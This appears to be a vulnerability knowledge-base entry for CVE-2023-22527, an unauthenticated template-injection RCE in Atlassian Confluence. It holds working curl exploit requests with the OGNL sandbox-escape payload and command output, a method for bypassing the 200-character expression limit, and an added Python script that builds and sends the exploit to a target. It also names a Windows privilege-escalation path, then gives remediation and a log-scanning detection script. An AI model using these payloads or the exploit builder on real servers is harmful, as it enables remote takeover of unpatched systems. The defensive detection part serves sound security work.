Attacker Value: High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2023-22527

Disclosure Date: January 16, 2024
Exploited in the Wild

Description

A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.

Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.

Technical Analysis

Overview

A vulnerability exists within Atlassian Confluence Data Center and Server that enables a remote, unauthenticated attacker to achieve OS command execution in the context of the application. The vulnerability is due to the text-inline.vm Velocity template passing the user-controlled label request parameter into an OGNL sink. Using the technique published by Rahul Maini and Harsh Jaiswal of ProjectDiscovery, an attacker can escape the sandbox that Struts enforces on OGNL evaluation: the Velocity context is exposed as the .KEY_velocity.struts2.context request attribute, and calling findValue on the ognl helper object it holds evaluates an arbitrary second expression (the p1 parameter below) without those restrictions. This was the basis for many of the public PoCs, which followed the pattern demonstrated below.

curl -i --location 'http://localhost:8090/template/aui/text-inline.vm' \
--header 'X-Cmd-In: touch /tmp/cmd_in' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--header 'Cookie: JSESSIONID=7EC7F710425BEBB71F71363591CD03BD' \
--data-urlencode 'label=\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.p1,{})+\u0027' \
--data-urlencode 'p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader('\''Cmd-Ret'\'',(new freemarker.template.utility.Execute()).exec({"id"}))'

HTTP/1.1 200 
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Confluence-Request-Time: 1706122679440
Cmd-Ret: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence) 
X-Accel-Buffering: no
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Wed, 24 Jan 2024 18:57:59 GMT

As noted by ProjectDiscovery in their writeup, however, there is a 200-character limit on the OGNL expressions that are evaluated. In the previous example this means the p1 parameter cannot exceed 200 characters; the setHeader/Execute wrapper around the command already consumes about 130 of them, so the OS command itself cannot exceed roughly 70 characters unless the command output is dropped from the response header. The limit can be sidestepped by having p1 read the command from an additional request parameter instead of embedding it. In the following example the p2 parameter carries the OS command; p2 is never evaluated as OGNL, so it is not subject to the 200-character limit and has fewer character restrictions, making it easier to send more complex command payloads. Note also why the command takes the form sh -c $@|sh . echo id: freemarker's Execute hands the string to Runtime.exec, which splits it on whitespace, so sh receives $@|sh as its -c script, . as $0 and echo id as the remaining arguments, and therefore runs echo id | sh without any quoting in the request.

curl -i --location 'http://localhost:8090/template/aui/text-inline.vm' \
--header 'X-Cmd-In: touch /tmp/cmd_in' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--header 'Cookie: JSESSIONID=7EC7F710425BEBB71F71363591CD03BD' \
--data-urlencode 'label=\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.p1,{})+\u0027' \
--data-urlencode 'p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader('\''Cmd-Ret'\'',(new freemarker.template.utility.Execute()).exec({@org.apache.struts2.ServletActionContext@getRequest().getParameter('\''p2'\'')}))' \
--data-urlencode 'p2=sh -c $@|sh . echo id'

HTTP/1.1 200 
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Confluence-Request-Time: 1706122962559
Cmd-Ret: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence) 
X-Accel-Buffering: no
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Wed, 24 Jan 2024 19:02:42 GMT
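The following script is an added example, not code from the AttackerKB page or from ProjectDiscovery. It builds the same label/p1/p2 form fields as the two curl requests above and measures them against the 200-character OGNL expression limit, so the budget left for an inline command and the switch to the p2 form can be checked before anything is sent. The base URL passed to run() is an assumption (the page uses http://localhost:8090); run() is the only function that touches the network and is not exercised by the offline checks.

```python
"""Build CVE-2023-22527 request bodies and check the 200-char OGNL limit.

Added example; the target URL and the helper names are assumptions.
"""
import urllib.parse
import urllib.request

OGNL_MAX_LEN = 200  # per ProjectDiscovery's writeup, as cited in the analysis

# Velocity/OGNL breakout exactly as in the curl examples. The \u0027 sequences
# are Java unicode escapes for single quotes that OGNL decodes during parsing.
LABEL = (
    "\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027)"
    ".internalGet(\\u0027ognl\\u0027).findValue(#parameters.p1,{})+\\u0027"
)

# Static wrapper around the command in the single-parameter (inline) form.
_P1_PREFIX = (
    "@org.apache.struts2.ServletActionContext@getResponse()"
    ".setHeader('Cmd-Ret',(new freemarker.template.utility.Execute()).exec({"
)
_P1_SUFFIX = "}))"

# Two-parameter form: p1 no longer embeds the command but reads it from p2,
# which is never evaluated as OGNL and so is not subject to the limit.
_P1_INDIRECT = (
    _P1_PREFIX
    + "@org.apache.struts2.ServletActionContext@getRequest().getParameter('p2')"
    + _P1_SUFFIX
)


def command_budget():
    """Characters left for an inline command once the quoted wrapper is subtracted."""
    return OGNL_MAX_LEN - (len(_P1_PREFIX) + 2 + len(_P1_SUFFIX))


def p1_fits(cmd):
    """True if cmd can be embedded directly in p1 without exceeding the limit."""
    return len(cmd) <= command_budget()


def build_body(cmd, indirect=None):
    """Return the form fields for one request as a dict.

    indirect=None picks the inline form when the command fits the budget and
    falls back to the p2 form otherwise.
    """
    if indirect is None:
        indirect = not p1_fits(cmd)
    if indirect:
        return {"label": LABEL, "p1": _P1_INDIRECT, "p2": cmd}
    if '"' in cmd:
        raise ValueError("a double quote would end the OGNL string literal; use the p2 form")
    return {"label": LABEL, "p1": _P1_PREFIX + '"' + cmd + '"' + _P1_SUFFIX}


def encode_body(fields):
    """application/x-www-form-urlencoded body, equivalent to curl --data-urlencode."""
    return urllib.parse.urlencode(fields)


def run(base_url, cmd, timeout=10):
    """POST the request and return the Cmd-Ret response header (network; assumed URL)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/template/aui/text-inline.vm",
        data=encode_body(build_body(cmd)).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.headers.get("Cmd-Ret")


if __name__ == "__main__":
    print("inline command budget:", command_budget())
    for c in ("id", "sh -c $@|sh . echo id", "x" * 90):
        body = build_body(c)
        form = "p2 form" if "p2" in body else "inline form"
        print(f"{len(body['p1']):>3} chars in p1, {form}, command={c[:24]!r}")
```

The inline form is only worth using for very short commands; the p2 form costs nothing extra, keeps p1 at a fixed length under the limit, and moves the command into a parameter that is not OGNL-parsed, which is why the second curl example above is the one to build on.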

This vulnerability also affects Windows installations. When installed on Microsoft Windows, Confluence runs by default as NT AUTHORITY\NETWORK SERVICE. From there an attacker can use named pipe impersonation against the RPCSS service to elevate to NT AUTHORITY\SYSTEM. This well-documented privilege escalation technique makes the exploit especially valuable to attackers targeting Windows installations.

Remediation

This vulnerability was patched in versions 8.5.4, 8.6.0 and 8.7.1. For complete version information, see CONFSERVER-93833.
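Beyond patching, defenders will want to find attempts that match the request pattern shown in the analysis. The script below is an added example, not from the AttackerKB page or from Atlassian: it scans Tomcat-style access log lines for direct requests to Velocity templates under /template/ (text-inline.vm in particular) and for the Velocity/OGNL breakout markers from the label parameter when they appear URL-encoded in a query string. The log lines are constructed for the example; the log format and the marker list are assumptions. Because POST bodies are not written to access logs, a POST to text-inline.vm is flagged on the path alone and the body must be pulled from a WAF or request-body log to confirm the label parameter.

```python
"""Flag CVE-2023-22527 request patterns in Tomcat-style access logs.

Added example; log lines below are constructed, not captured.
"""
import re

SAMPLE_LOG = """\
203.0.113.7 - - [24/Jan/2024:18:57:59 +0000] "POST /template/aui/text-inline.vm HTTP/1.1" 200 1 "-" "curl/8.4.0"
10.10.1.4 - - [24/Jan/2024:18:58:03 +0000] "GET /rest/api/content?spaceKey=ENG HTTP/1.1" 200 5321 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Jan/2024:19:02:42 +0000] "GET /template/aui/text-inline.vm?label=%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context HTTP/1.1" 200 1 "-" "python-requests/2.31"
10.10.1.9 - - [24/Jan/2024:19:03:10 +0000] "GET /template/aui/text-inline.vm HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# Common access log layout: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Any Velocity template requested directly under /template/ (text-inline.vm is the
# one abused in the public PoCs; the match is kept broad on purpose).
TEMPLATE_RE = re.compile(r"^/template/.*\.vm(\?|$)")

# URL-encoded fragments of the label breakout from the analysis, lower-cased.
OGNL_MARKERS = ("%23request", "key_velocity", "findvalue", "%5cu0027", "%23parameters")


def parse_line(line):
    """Return the fields of one access log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_suspicious(log_text):
    """Return parsed records for template requests, each with a list of reasons."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not TEMPLATE_RE.match(rec["target"]):
            continue
        reasons = ["direct request to a Velocity template under /template/"]
        lowered = rec["target"].lower()
        if any(marker in lowered for marker in OGNL_MARKERS):
            reasons.append("Velocity/OGNL breakout markers in query string")
        if rec["method"] == "POST":
            reasons.append("POST body not logged; check WAF/request-body logs for label=")
        rec["reasons"] = reasons
        hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['method']} {hit['status']} {hit['target'][:60]}")
        for reason in hit["reasons"]:
            print("   -", reason)
```

A 404 on the template path is still worth listing: it shows who is probing, and on a patched instance it is the expected outcome. A 200 with a Cmd-Ret response header, as in the analysis above, would not appear in the access log at all, so response headers have to come from a proxy or WAF in front of Confluence.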

CVSS V3 Severity and Metrics
Base Score: 9.8 Critical
Impact Score: 5.9
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • atlassian

Products

  • confluence data center
  • confluence data center 8.7.0
  • confluence server
